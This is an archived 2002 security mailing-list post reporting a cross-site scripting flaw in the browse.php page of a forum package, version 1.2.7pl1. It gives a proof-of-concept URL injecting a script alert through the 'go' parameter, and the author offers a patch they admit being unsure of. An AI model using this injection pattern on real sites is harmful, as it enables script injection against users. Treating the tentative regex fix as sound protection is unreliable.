|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Arab VieruZ (arabviersus_at_hotmail.com)
Date: Thu Oct 10 2002 - 07:43:11 CDT
('binary' encoding is not supported, stored as-is)
Vulnerable systems:
1.2.7pl1
Exploit:
forums/browse.php?fid=3&tid=46&go=<scri*pt>JavaScript:alert
('Hi');</scri*pt>
(with out "*")
Solution:
i thought this but i am not sure
open browse.php and add this code in line 52:
$go = HTMLSpecialChars($go);
$go = PREG_Replace("/[A-Z&.;:()~!
#$%^''*\{\}\/]/i", "", $go);
----------------------------------
Arab Vieruz
thanx
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]